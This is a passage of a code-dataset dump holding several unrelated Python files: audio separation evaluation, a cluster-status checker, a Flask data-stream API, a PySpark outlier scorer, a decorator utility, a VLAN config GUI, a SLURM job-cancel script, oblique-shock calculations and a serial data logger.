window=window, win_length=window_size)\n # recov = scipy.signal.wiener(recov)\n recov = np.reshape(recov, (1, recov.shape[0], 1))\n\n all_zeros = np.all(gt_voc<=0) or np.all(gt_bas<=0) or np.all(gt_dru<=0) or np.all(gt_others<=0) or np.all(vocals<=0) or np.all(bass<=0) or np.all(drums<=0) or np.all(others<=0)\n # print(all_zeros)\n\n if all_zeros == False:\n # noise_thresh = checkNoise(gt_voc)\n #\n # if noise_thresh > 0.05:\n # noise_thresh = checkNoise(gt_bas)\n #\n # if noise_thresh > 0.05:\n # noise_thresh = checkNoise(gt_dru)\n #\n # if noise_thresh > 0.05:\n # Evaluate\n REF = np.concatenate((gt_voc_final, gt_bas_final, gt_dru_final, gt_others_final, gt_inp_final), axis=0)\n EST = np.concatenate((vocals, bass, drums, others, recov), axis=0)\n\n [SDR, ISR, SIR, SAR] = museval.evaluate(REF, EST, win=52565, hop=52565)\n SDR_results.append(SDR)\n ISR_results.append(ISR)\n SIR_results.append(SIR)\n SAR_results.append(SAR)\n\n y_true = np.array(labelresults, dtype=float)\n y_pred = np.array(classresults, dtype=float)\n y_pred = np.reshape(y_pred, (y_pred.shape[0], y_pred.shape[2]))\n y_pred_hat = np.array(classresults_hat, dtype=float)\n y_pred_hat = np.reshape(y_pred_hat, (y_pred_hat.shape[0], y_pred_hat.shape[2]))\n\n auc_voc, eer_voc = eval_metrics(y_true[:,0], y_pred[:,0])\n auc_bas, eer_bas = eval_metrics(y_true[:,1], y_pred[:,1])\n auc_dru, eer_dru = eval_metrics(y_true[:,2], y_pred[:,2])\n auc_oth, eer_oth = eval_metrics(y_true[:,3], y_pred[:,3])\n\n target_names = ['Vocals', 'Bass', 'Drums', 'Others']\n plot_multiclass_confusion_matrix(y_true, y_pred_hat, target_names, save_plot=False)\n\n SDR_array = np.array(SDR_results)\n SDR_array = np.reshape(SDR_array, (SDR_array.shape[0], SDR_array.shape[1]))\n SDR_df = pd.DataFrame(SDR_array)\n SDR_df.to_csv('SDR_revise1.csv')\n\n ISR_array = np.array(ISR_results)\n ISR_array = np.reshape(ISR_array, (ISR_array.shape[0], ISR_array.shape[1]))\n ISR_df = pd.DataFrame(ISR_array)\n ISR_df.to_csv('ISR_revise1.csv')\n\n SIR_array = np.array(SIR_results)\n SIR_array = np.reshape(SIR_array, (SIR_array.shape[0], SIR_array.shape[1]))\n SIR_df = pd.DataFrame(SIR_array)\n SIR_df.to_csv('SIR_revise1.csv')\n\n SAR_array = np.array(SAR_results)\n SAR_array = np.reshape(SAR_array, (SAR_array.shape[0], SAR_array.shape[1]))\n SAR_df = pd.DataFrame(SAR_array)\n SAR_df.to_csv('SAR_revise1.csv')\n\n print(\"Vocals: AUC = \" + str(auc_voc) + \" | EER = \" + str(eer_voc) + \" | SDR = \" + str(np.round(np.nanmedian(SDR_array[:,0]), decimals=3)))\n print(\"Bass: AUC = \" + str(auc_bas) + \" | EER = \" + str(eer_bas) + \" | SDR = \" + str(np.round(np.nanmedian(SDR_array[:,1]), decimals=3)))\n print(\"Drums: AUC = \" + str(auc_dru) + \" | EER = \" + str(eer_dru) + \" | SDR = \" + str(np.round(np.nanmedian(SDR_array[:,2]), decimals=3)))\n print(\"Others: AUC = \" + str(auc_oth) + \" | EER = \" + str(eer_oth) + \" | SDR = \" + str(np.round(np.nanmedian(SDR_array[:,3]), decimals=3)))\n print(\"SDR Recovered = \" + str(np.round(np.nanmedian(SDR_array[:,4]), decimals=3)))\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n","sub_path":"series/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":16303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"292816045","text":"#!/usr/bin/env python\nimport argparse\n\nfrom operator import itemgetter\nfrom common import load_config\nfrom common import query_status\n\n\ndef main(args):\n all_status = query_status(args)\n if len(all_status) == 0:\n print(\"No instance found in the cluster '{}'. Quit.\".format(args[\"name\"]))\n return\n print(\"{} clusters found with the name '{}'.\".format(len(all_status), args[\"name\"]))\n\n num_ready = 0\n for idx, status in enumerate(all_status):\n total = len(status)\n if total == 0:\n continue\n print(\"\\nCluster {}:\".format(idx + 1))\n ready = sum(t[0] == \"running\" for t in status)\n neighbors = list(map(itemgetter(1), status))\n print(\" Total instances: {}\\n Running: {}\".format(total, ready))\n if ready == 0:\n print(\" Instances status: {}\".format(status[0][0]))\n continue\n with open(\"neighbors.txt\", 'w') as f:\n if total == ready:\n f.write(\"Ready. \")\n else:\n f.write(\"NOT ready. \")\n f.write(\"IP addresses of all instances:\\n\")\n f.write('\\n'.join(neighbors))\n print(\" The public IP addresses of the instances have been written into \"\n \"`./neighbors.txt`\")\n if num_ready > 1:\n print(\"WARN: More than 1 cluster with the name '{}' exists. \"\n \"Only the IP addresses of the instances of the last cluster have been written to disk.\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Check the status of a cluster\")\n parser.add_argument(\"--name\",\n required=True,\n help=\"cluster name\")\n parser.add_argument(\"--credential\",\n help=\"path to the credential file\")\n config = load_config(vars(parser.parse_args()))\n main(config)","sub_path":"scripts/check-cluster.py","file_name":"check-cluster.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"609627470","text":"from BPTK_Py import Model\nfrom BPTK_Py import sd_functions as sd\nfrom import_data import *\nfrom general_functions import *\n\n\ndef set_model_logic(start_serial, stop_serial, df):\n \"\"\" Setup model based on start date, end date, and df containing input data \"\"\"\n\n time_step_in_days = 2\n\n model = Model(\n starttime=start_serial,\n stoptime=stop_serial,\n dt=1.0 * time_step_in_days,\n )\n\n # create stocks (w/ initial values, and connect initial values)\n P_s, P_s_iv = create_model_stock(model, \"Producer Stock\")\n\n # create flows\n P_birth_f = model.flow(\"Birth Rate\")\n P_death_f = model.flow(\"Total Death Rate\")\n\n # create converters\n lifespan = model.converter(\"Average Lifespan\")\n fertility = model.converter(\"Average Fertility\")\n illness_death_rate = model.converter(\"Illness Death Rate\")\n normal_death_rate = model.converter(\"Normal Death Rate\")\n\n # create constants\n lifespan_bl = model.constant(\"Lifespan Baseline\")\n fertility_bl = model.constant(\"Fertility Baseline\")\n health = model.constant(\"Animal Health\")\n illness_death_t = model.constant(\"Illness Death Time\")\n\n # create data inputs (points AND corresponding converters)\n price_vam = create_model_data_variable(model, df, \"Price (VAM)\")\n cpi_fao = create_model_data_variable(model, df, \"CPI (FAO)\")\n\n # attach flows to stocks\n P_s.equation = P_birth_f - P_death_f\n\n # set equations for flows and converters\n lifespan.equation = lifespan_bl * health\n fertility.equation = fertility_bl\n P_birth_f.equation = P_s * fertility\n normal_death_rate.equation = P_s / lifespan\n illness_death_rate.equation = P_s * (1.0 - health) / illness_death_t\n P_death_f.equation = normal_death_rate + illness_death_rate\n\n # set default values for constants\n P_s_iv.equation = 100.0\n lifespan_bl.equation = 20.0 * 365.0\n fertility_bl.equation = 0.1 / 365.0\n health.equation = 1.0\n illness_death_t.equation = 0.5 * 365.0\n\n return model\n","sub_path":"model_config.py","file_name":"model_config.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"106880620","text":"import json\nimport time\n\nimport ntplib\nfrom flask import request, Response, jsonify\n\nfrom engine import app\nfrom model.preload import Stream\nimport util.calc\nfrom util.cass import stream_exists\nfrom util.common import CachedParameter, StreamEngineException, MalformedRequestException, \\\n InvalidStreamException, StreamUnavailableException, InvalidParameterException\n\n\n@app.errorhandler(StreamEngineException)\ndef handle_stream_not_found(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n@app.route('/particles', methods=['POST'])\ndef particles():\n \"\"\"\n POST should contain a dictionary of the following format:\n {\n 'streams': [\n {\n 'subsite': subsite,\n 'node': node,\n 'sensor': sensor,\n 'method': method,\n 'stream': stream,\n 'parameters': [...],\n },\n ...\n ],\n 'coefficients': {\n 'CC_a0': 1.0,\n ...\n },\n 'start': ntptime,\n 'stop': ntptime\n }\n\n :return: JSON object:\n \"\"\"\n input_data = request.get_json()\n validate(input_data)\n start = input_data.get('start', 1)\n stop = input_data.get('stop', ntplib.system_to_ntp_time(time.time()))\n return Response(util.calc.get_particles(input_data.get('streams'), start, stop, input_data.get('coefficients', {})),\n mimetype='application/json')\n\n\n@app.route('/netcdf', methods=['POST'])\ndef netcdf():\n \"\"\"\n POST should contain a dictionary of the following format:\n {\n 'streams': [\n {\n 'subsite': subsite,\n 'node': node,\n 'sensor': sensor,\n 'method': method,\n 'stream': stream,\n 'parameters': [...],\n },\n ...\n ],\n 'coefficients': {\n 'CC_a0': 1.0,\n ...\n },\n 'start': ntptime,\n 'stop': ntptime\n }\n\n :return: JSON object:\n \"\"\"\n input_data = request.get_json()\n validate(input_data)\n start = input_data.get('start', 1)\n stop = input_data.get('stop', ntplib.system_to_ntp_time(time.time()))\n return Response(util.calc.get_netcdf(input_data.get('streams'), start, stop, input_data.get('coefficients', {})),\n mimetype='application/netcdf')\n\n\n@app.route('/needs', methods=['POST'])\ndef needs():\n \"\"\"\n Given a list of reference designators, streams and parameters, return the\n needed calibration constants for each reference designator\n and the data products which can be computed. Data products which\n are missing L0 data shall not be returned.\n\n Currently no validation on time frames is provided. If the necessary L0\n data from any time frame is available then this method will return that\n product in the list of parameters. When the algorithm is run, a determination\n if the needed data is present will be made.\n\n Note, this method may return more reference designators than specified\n in the request, should more L0 data be required.\n\n POST should contain a dictionary of the following format:\n {\n 'streams': [\n {\n 'subsite': subsite,\n 'node': node,\n 'sensor': sensor,\n 'method': method,\n 'stream': stream,\n 'parameters': [...],\n },\n ...\n ]\n }\n\n :return: JSON object:\n {\n 'streams': [\n {\n 'subsite': subsite,\n 'node': node,\n 'sensor': sensor,\n 'method': method,\n 'stream': stream,\n 'coefficients': [...],\n 'parameters': [...],\n },\n ...\n ]\n }\n \"\"\"\n input_data = request.get_json()\n validate(input_data)\n output_data = {'streams': util.calc.get_needs(input_data.get('streams'))}\n return Response(json.dumps(output_data), mimetype='application/json')\n\n\ndef validate(input_data):\n if input_data is None:\n raise MalformedRequestException('Received NULL input data')\n\n streams = input_data.get('streams')\n if streams is None or not isinstance(streams, list):\n raise MalformedRequestException('Received invalid request', payload={'request': input_data})\n\n for each in streams:\n if not isinstance(each, dict):\n raise MalformedRequestException('Received invalid request, stream is not dictionary',\n payload={'request': input_data})\n keys = each.keys()\n required = {'subsite', 'node', 'sensor', 'method', 'stream'}\n missing = required.difference(keys)\n if len(missing) > 0:\n raise MalformedRequestException('Missing stream information from request',\n payload={'request': input_data})\n\n stream = Stream.query.filter(Stream.name == each['stream']).first()\n if stream is None:\n raise InvalidStreamException('The requested stream does not exist in preload', payload={'stream': each})\n\n if not stream_exists(each['subsite'],\n each['node'],\n each['sensor'],\n each['method'],\n each['stream']):\n raise StreamUnavailableException('The requested stream does not exist in cassandra',\n payload={'stream' :each})\n\n parameters = each.get('parameters', [])\n stream_parameters = [p.id for p in stream.parameters]\n for pid in parameters:\n p = CachedParameter.from_id(pid)\n if p is None:\n raise InvalidParameterException('The requested parameter does not exist in preload',\n payload={'id': pid})\n\n if pid not in stream_parameters:\n raise InvalidParameterException('The requested parameter does not exist in this stream',\n payload={'id': pid, 'stream': each})\n\n if not isinstance(input_data.get('coefficients', {}), dict):\n raise MalformedRequestException('Received invalid coefficient data, must be a map',\n payload={'coefficients': input_data.get('coefficients')})","sub_path":"engine/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"257178287","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pyspark import SparkContext\nfrom operator import add\nimport pandas as pd\nimport numpy as np\nsc = SparkContext()\n\n\ndef get_categ_column_list(file):\n\tdf = pd.DataFrame.from_csv(file, sep='\\t', index_col=None)\n\n\tname_lst = list(df.select_dtypes(include=['object']).columns)\n\tindex_lst = [df.columns.get_loc(i) for i in name_lst]\n\treturn index_lst, name_lst\n\ndef parseDevelopmentDatasetLine(line):\n\tline = line.split('\\t')\n\tretval = []\n\tfor i in range(len(index_lst)):\n\t\tkey = name_lst[i]\n\t\tvalue = line[index_lst[i]]\n\t\tretval.append((key, value))\n\n\treturn retval\n\ndef attributeValueFrequencyScorer(line):\n\t\"\"\"\n\tConnects each line to attribute value frequency score (up to constant factor)\n\n\t:param line: line turned to list of (label, value) tuples\n\t:returns: original line and attribute value frequency score.\n\t\"\"\"\n\n\t# Let's score each line and create a tuple (line, score)\n\tscore = 0\n\tfor item in line:\n\t# item[0] is attribute id\n\t# item[1] is value of the attribute\n\n\t\tscore += counts[str(item[0])][str(item[1])]\n\n\treturn (line, score)\n\n\nif __name__ == '__main__':\n\tindex_lst, name_lst = get_categ_column_list('5fn4-dr26.tsv')\n\n\n\tdata = sc.textFile('5fn4-dr26.tsv')\n\theader = data.first()\n\tdata = data.filter(lambda row: row != header)\n\tparsed_data = data.map(parseDevelopmentDatasetLine)\n\n\t# Let's count the number of times different attribute values\n\t# are present in the dataset.\n\n\tgrouped_by_attribute_value_labels = parsed_data.flatMap(lambda x: x).reduceByKey(lambda x,y: x + '\\t' + y )\n#\tprint(grouped_by_attribute_value_labels.take(5))\n\tkeys = grouped_by_attribute_value_labels.keys().collect()\n\n\t# Count for all possible values for each attribute value\n\tcounts = {}\n\tfor key in keys:\n\t\t# Let's turn tuples to dict\n\t\tvalues = grouped_by_attribute_value_labels.filter(lambda x: x[0] == key).flatMap(lambda x: x[1].split('\\t')).map(lambda x: (x, 1)).reduceByKey(add).collect()\n\t\tcounts[str(key)] = dict(values)\n\n\t# Let's go through the dataset and score each item\n\tavf_scored_data = parsed_data.map(attributeValueFrequencyScorer).sortBy(lambda x: x[1])\n\n\toutliers = avf_scored_data.take(10) # Let's print 10 most likely outliers\n\tfor item in outliers:\n\t\tprint (item)\n\n\tsc.parallelize(outliers).saveAsTextFile('avf.out')\n","sub_path":"avf_v1.py","file_name":"avf_v1.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"284200492","text":"#! /usr/bin/env python\n\"\"\"\nCopyright (C) 2011 by Peter A. Donis.\nReleased under the open source MIT license:\nhttp://www.opensource.org/licenses/MIT\n\nDecorator wrapper class to delay decorating the base function until\nit is actually invoked. The use case that prompted writing this class\nwas the desire to \"memoize\" the generator encapsulated in the\n``PowerSeries`` class. The obvious Pythonic way to do this is to\nwrite a decorator that can be applied to a method on the class, and\nmake the method a generator function which the decorator then turns\ninto a memoized generator. However, if the decorator is implemented\nin the usual way, this does not work properly; the memoization is done\nat the class level, when what is really desired is to do it at the\ninstance level. In other words, the usual decorator implementation\nwould make the decorated method a normal member of the class, but\nthat would result in the memoized generator becoming common to *all*\ninstances of the class. Since each instance represents a different\npower series, and hence a different generator, this is not what is\nneeded.\n\nThe solution is to delay applying the decorator until the decorated\nfunction is actually called. For an ordinary function, this does\nnot really change anything; but for a method, it means the decorator\nwrapper can now use the descriptor protocol to be invoked each time\nthe method is called on a new instance of the class. Then the\ndecorator can be applied separately for each instance; in the case\nof the ``PowerSeries`` class, it means each series gets its own\nmemoized generator, as desired. As a side effect, the decorator is\nalso applied the first time the method is called as an unbound\nmethod on the class itself; this use case should be very rare, but\nit is supported for consistency with the behavior of normal methods.\n\nTypical usage and comparison with normal decorators:\n \n >>> def decorator(f):\n ... print \"Decorating\", f.__name__\n ... return f\n ...\n >>> @decorator\n ... def test1():\n ... print \"Tested!\"\n ...\n Decorating test1\n >>> test1()\n Tested!\n >>> test1()\n Tested!\n >>> def deco(f):\n ... return DelayedDecorator(decorator, f)\n ...\n >>> @deco\n ... def test2():\n ... print \"Tested again!\"\n ...\n >>> test2()\n Decorating test2\n Tested again!\n >>> test2()\n Tested again!\n >>> class TestA(object):\n ... @decorator\n ... def test3(self):\n ... print \"Test from\", self.__class__.__name__\n ...\n Decorating test3\n >>> a = TestA()\n >>> aa = TestA()\n >>> a.test3()\n Test from TestA\n >>> aa.test3()\n Test from TestA\n >>> aa.test3()\n Test from TestA\n >>> a.test3()\n Test from TestA\n >>> class TestB(object):\n ... @deco\n ... def test4(self):\n ... print \"Test from\", self.__class__.__name__\n ...\n >>> b = TestB()\n >>> bb = TestB()\n >>> b.test4()\n Decorating test4\n Test from TestB\n >>> bb.test4()\n Decorating test4\n Test from TestB\n >>> bb.test4()\n Test from TestB\n >>> b.test4()\n Test from TestB\n\"\"\"\n\nfrom new import instancemethod\n\n\nclass DelayedDecorator(object):\n \"\"\"Wrapper that delays decorating a function until it is invoked.\n \n This class allows a decorator to be used with both ordinary functions and\n methods of classes. It wraps the function passed to it with the decorator\n passed to it, but with some special handling:\n \n - If the wrapped function is an ordinary function, it will be decorated\n the first time it is called.\n \n - If the wrapped function is a method of a class, it will be decorated\n separately the first time it is called on each instance of the class.\n It will also be decorated separately the first time it is called as\n an unbound method of the class itself (though this use case should\n be rare).\n \"\"\"\n \n def __init__(self, deco, func):\n # The base decorated function (which may be modified, see below)\n self._func = func\n # The decorator that will be applied\n self._deco = deco\n # Variable to monitor calling as an ordinary function\n self.__decofunc = None\n # Variable to monitor calling as an unbound method\n self.__clsfunc = None\n \n def _decorated(self, cls=None, instance=None):\n \"\"\"Return the decorated function.\n \n This method is for internal use only; it can be implemented by\n subclasses to modify the actual decorated function before it is\n returned. The ``cls`` and ``instance`` parameters are supplied so\n this method can tell how it was invoked. If it is not overridden,\n the base function stored when this class was instantiated will\n be decorated by the decorator passed when this class was instantiated,\n and then returned.\n \n Note that factoring out this method, in addition to allowing\n subclasses to modify the decorated function, ensures that the\n right thing is done automatically when the decorated function\n itself is a higher-order function (e.g., a generator function).\n Since this method is called every time the decorated function\n is accessed, a new instance of whatever it returns will be\n created (e.g., a new generator will be realized), which is\n exactly the expected semantics.\n \"\"\"\n return self._deco(self._func)\n \n def __call__(self, *args, **kwargs):\n \"\"\"Direct function call syntax support.\n \n This makes an instance of this class work just like the underlying\n decorated function when called directly as an ordinary function.\n An internal reference to the decorated function is stored so that\n future direct calls will get the stored function.\n \"\"\"\n if not self.__decofunc:\n self.__decofunc = self._decorated()\n return self.__decofunc(*args, **kwargs)\n \n def __get__(self, instance, cls):\n \"\"\"Descriptor protocol support.\n \n This makes an instance of this class function correctly when it\n is used to decorate a method on a user-defined class. If called\n as a bound method, we store the decorated function in the instance\n dictionary, so we will not be called again for that instance. If\n called as an unbound method, we store a reference to the decorated\n function internally and use it on future unbound method calls.\n \"\"\"\n if instance:\n deco = instancemethod(self._decorated(cls, instance), instance, cls)\n # This prevents us from being called again for this instance\n setattr(instance, self._func.__name__, deco)\n elif cls:\n if not self.__clsfunc:\n self.__clsfunc = instancemethod(self._decorated(cls), None, cls)\n deco = self.__clsfunc\n else:\n raise ValueError(\"Must supply instance or class to descriptor.\")\n return deco\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"DelayedDecorator.py","file_name":"DelayedDecorator.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"183652711","text":"#!/usr/bin/env python3\n\nfrom collections import OrderedDict\nimport json\nimport os\nimport signal\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\n\nroot = tk.Tk()\nroot.geometry(\"600x350\")\n\nroot.columnconfigure(0, weight=1)\nroot.columnconfigure(1, weight=2)\nroot.rowconfigure(0, weight=1)\n\n#mapping from json key name to label text\nelements = OrderedDict([('vlan_id', 'Vlan Id'), ('vrf', 'VRF Instance'), ('addr', 'L3 gateway address'), ('mask', 'Subnet mask CIDR'), ('mcast_grp', 'Mcast address mapping')])\n\n\ndef sigint_handler(signum, frame):\n exitbox = tk.messagebox.askquestion('Exit?', 'Are you sure you want to exit?', icon='warning')\n if exitbox == 'yes':\n root.destroy()\n\n\ndef getInput():\n filename = filedialog.asksaveasfilename(initialdir=os.getcwd(), title='Select filename to save as', filetypes=(('json files', '*.json'), ('all files', '*.*')))\n\n data = {}\n\n for elem in entries:\n entry = entries[elem]\n data[elem] = entry.get()\n if elem == 'vlan_id':\n data['l2_vni_id'] = data[elem] + '10'\n\n with open(filename, 'w') as jsonfile:\n json.dump(data, jsonfile)\n\n\nrectangle_topleft = tk.Label(root, text=\"Singh Swan Song: \", bg=\"black\", fg=\"white\")\nrectangle_topleft.grid(column=0, row=0, ipadx=30, ipady=30, sticky=\"EW\")\nrectangle_topright = tk.Label(root, text=\"L2vni Configuration Generator: \", bg=\"black\", fg=\"white\")\nrectangle_topright.grid(column=1, row=0, ipadx=30, ipady=30, sticky=\"EW\")\n\nrectangles = []\nentries = OrderedDict()\nfor i, elem in enumerate(elements):\n bgcolour = \"green\" if i%2 == 0 else \"red\"\n rect = tk.Label(root, text=elements[elem] + ':', bg=bgcolour, fg=\"white\")\n rect.grid(column=0, row=i+1, ipadx=10, ipady=10, sticky=\"EW\")\n rectangles.append(rect)\n entry = tk.Entry(root)\n entry.grid(column=1, row=i+1, ipadx=10, ipady=10, sticky=\"EW\")\n entries[elem] = entry\n\n\nbutton = tk.Button(root, text=\"submit\", command=getInput)\nbutton.grid(column=0, row=6, ipadx=10, ipady=10, sticky=\"EW\")\n\n#setup a sig handler for ctrl-c\nsignal.signal(signal.SIGINT, sigint_handler)\n\nroot.mainloop()\n","sub_path":"L2_vni/guijson_vlantovni_map.py","file_name":"guijson_vlantovni_map.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"638350139","text":"from subprocess import Popen, PIPE\nimport re\nimport os\n\n\n# Get the name of the user\nproc = Popen(['whoami'], stdout=PIPE, stderr=PIPE)\no, _ = proc.communicate()\nusername = o.decode('ascii').strip()\n\n# Get all jobs under username\noutput = os.popen(\"squeue | grep {}\".format(username)).read()\n\n# Find all job ids\njob_ids = [int(s)\n for s in re.findall(r'\\d+', output) if int(s) > 10000000]\n\nfor job_id in job_ids:\n os.system(\"scancel {}\".format(job_id))\n print(\"Killed job: \", job_id)\n\n","sub_path":"parameter_server/submit/kill.py","file_name":"kill.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"218199832","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 19 20:49:25 2021\n@author: dbric\n\"\"\"\n\n\"\"\"\nDeclan Brick\nMatthew Bethea\n2/17/21\nMAE 343\nProject 1\n\"\"\"\n\n#import here\nimport math\n\ndef mach(gamma, Beta, Theta):\n \n B = math.radians(Beta)\n T = math.radians(Theta)\n g = gamma\n \n RMach = math.sqrt((-2*math.tan(T)-2*(1/(math.tan(B)))/(g*math.tan(T)+math.tan(T)*math.cos(2*B)-2*math.sin(B)*math.sin(B)*(1/(math.tan(B))))))\n \n return RMach\n\n\ndef theta(gamma, Mach, Beta):\n \n g = gamma\n M = Mach\n B = Beta\n \n \"\"\"\n Calculates flow deflection angle using Equation 1 in the Project Description Parameters\n ----------\n g : Float\n Ratio of specific heats\n M : Float\n Free Stream Mach Number before Shock\n Beta : Float\n Oblique Shock Angle, in degrees\n \n Returns\n -------\n Theta: Float\n Flow Deflection Angle, in degrees\n \"\"\"\n\n \n #Just writing rhs of Equation 1\n Tan_Theta=2*(1/math.tan(math.radians(B)))*(M**2*(math.sin(math.radians(B)))**2-1)/(M**2*(g+math.cos(math.radians(2*B)))+2)\n \n #Now grabbing the actual angle\n RTheta=math.degrees(math.atan(Tan_Theta))\n \n return RTheta\n #this was verified using a Ti-84 to output the correct answer, but many want to change output decimal precision\n\n\ndef beta(gamma, Mach, Theta):\n \n \n g = gamma\n M = Mach\n T = Theta\n \n #using the functions for finding Beta max (the maximum shock angle) supported by the maximum Theta (the maximum flow deflection)\n f = lambda B: math.atan(2*(1/math.tan(math.radians(B)))*(M**2*(math.sin(math.radians(B)))**2-1)/(M**2*(g+math.cos(math.radians(2*B)))+2))-math.radians(T)\n \n g = gamma\n M = Mach\n T = Theta\n \n RBeta = []\n \n BM = M_Beta(g,M)\n \n Theta_max = M_Theta(g, M, BM)\n \n Mach_angle = Mach_a(M)\n\n #Strong Root for Beta function\n #This root will be between 90 and the theta max\n #F = the function\n #sA = Theta max\n #sB = 90\n #iteration is set automatically to 100\n\n #setting bounds\n for c in range(1,3):\n if c == 1:\n Old_A = math.degrees(BM) #p0\n Old_B = float(90) #p1\n \n if c == 2:\n Old_A = Mach_angle\n Old_B = math.degrees(BM)\n \n #verifying\n## if f(Old_A)*f(Old_B) >= 0:\n## print(\"failed verification\")\n## return None\n\n #iterating to find the solution for beta\n for n in range(1, 100):\n \n new = Old_B - f(Old_B)*(Old_B - Old_A)/(f(Old_B)-f(Old_A))\n solvenew = f(new)\n \n if abs(new-Old_B) <0.0001:\n sBeta = Old_A - f(Old_A)*(Old_B - Old_A)/(f(Old_B) - f(Old_A))\n \n RBeta.append([sBeta,n])\n break\n\n elif n==99:\n print('failed')\n else:\n Old_A=Old_B\n Old_B=new\n \n return RBeta\n\ndef M_Beta(g,M):\n #print(\"veriables\")\n #print(g)\n #print(M)\n f1 = 1+((g-1)/2)*(M**2)+((g+1)/16)*(M**4)\n f2 = math.sqrt((g+1)*f1)\n f3 = (((g+1)/4)*(M**2)+f2-1)\n f4 = math.sqrt((1/(g*(M**2)))*f3)\n BM = math.asin(f4)\n #print(\"Beta Max\")\n #print(BM)\n return BM\n\n\ndef M_Theta(gamma, Mach, Beta):\n\n #print(\"Varribles\")\n #print(gamma)\n #print(Mach)\n #print(Beta)\n \n g = gamma\n M = Mach\n B = Beta\n \n top = ((M**2)*(math.sin(B)*math.sin(B))-1)*(1/math.tan(B))\n bot = (((1/2)*(g+1)*(M**2))-((M**2)*(math.sin(B)*math.sin(B)))+1)\n \n TM = math.degrees(1/(math.tan(top/bot)))\n\n #print(\"The maximum flow deflection is \")\n #print(TM)\n \n return TM\n\n\ndef Mach_a(Mach):\n \n M = Mach\n \n mu = math.degrees(math.asin(1/M))\n\n #print(mu)\n \n return mu\n\n\n#Main Code area\n\nfunctionMatrix = {\n \"Mach\":mach,\n \"Theta\":theta,\n \"Beta\":beta ,\n}\n\nlst = {\n \"Mach\":[\"gamma\", \"Beta\", \"Theta\"],\n \"Theta\":[\"gamma\", \"Mach\", \"Beta\"],\n \"Beta\":[\"gamma\", \"Mach\", \"theta\"]\n }\n\nver = []\n\nprint(\"Available Functions:\")\nfor function in functionMatrix.keys():\n print(function)\n\nchosen = str(input(\"Which Function Would You Like to run? \"))\nprint(chosen)\n\nvariableList = lst[chosen]\nfor var in variableList:\n ele = float(input(f\"Please input {var}: \"))\n ver.append(ele)\n \nresults = functionMatrix[chosen](*ver)\n\nif isinstance(results, list):\n a,b = results\n a = results[0]\n b = results[1]\n print('potato')\n pass # list returned\nelse:\n pass # 1 value returend\n\n\n\"\"\"\nMn1=M*math.sin(math.radians(Beta))\nMn2=((Mn1**2+(2/(gamma-1)))/((2*gamma/(gamma-1)*Mn1**2)-1))**0.5\nM2=Mn2/(math.sin(math.radians(Beta-Theta)))\nPressure_Ratio=1+(Mn1**2-1)*(2*gamma/(gamma+1))\nDensity_Ratio=((gamma+1)*Mn1**2)/((gamma-1)*Mn1**2+2)\nTemperature_ratio=Pressure_Ratio/Density_Ratio\n\"\"\"\n","sub_path":"MatthewsWorkInProgressCode.py","file_name":"MatthewsWorkInProgressCode.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"8876282","text":"#!/usr/bin/env python\n\n# Load the libraries\nimport serial # Serial communications\nimport time # Timing utilities\nimport subprocess # Shell utilities ... compressing data files\n\n# Set the time constants\nrec_time=time.gmtime()\ntimestamp = time.strftime(\"%Y/%m/%d %H:%M:%S GMT\",rec_time)\n# Read the settings from the settings file\nsettings_file = open(\"./settings.txt\")\n# e.g. \"/dev/ttyUSB0\"\nsettings_line = settings_file.readline().rstrip('\\n').split(',')\nport = settings_line[0]\nbaud = eval(settings_line[1])\npar = settings_line[2]\nbyte = eval(settings_line[3])\nceol = settings_line[4]\nif ceol == 'r':\n\teol = b'\\r'\nelif ceol == 'nr':\n\teol = b'\\n\\r'\nelse:\n\teol = b'\\n'\nprint(port)\n# path for data files\n# e.g. \"/home/logger/datacpc3010/\"\ndatapath = settings_file.readline().rstrip('\\n')\nprint(datapath)\nprev_file_name = datapath+time.strftime(\"%Y%m%d.txt\",rec_time)\n# Read the compressing flag\nflags = settings_file.readline().rstrip().split(',')\n# Close the settings file\nsettings_file.close()\n# Hacks to work with custom end of line\nleneol = len(eol)\nprint(leneol)\nbline = bytearray()\n# Open the serial port and clean the I/O buffer\nser = serial.Serial()\nser.port = port\nser.baudrate = baud\nser.parity = par\nser.bytesize = byte\nser.open()\nser.flushInput()\nser.flushOutput()\nwhile True:\n\t# Get a line of data from the instrument\n\twhile True:\n\t\tc = ser.read(1)\n\t\tbline += c\n\t\tif bline[-leneol:] == eol:\n\t\t\tbreak\n\t## Parse the data line\n\tline = bline.decode(\"utf-8\").rstrip()\n\t#line = ser.readline()\n\t# Set the time for the record\n\trec_time_s = int(time.time())\n\trec_time=time.gmtime()\n\ttimestamp = time.strftime(\"%Y/%m/%d %H:%M:%S GMT\",rec_time)\n\tfile_line = timestamp+','+line\n\tprint(file_line)\n\t# Save it to the appropriate file\n\tcurrent_file_name = 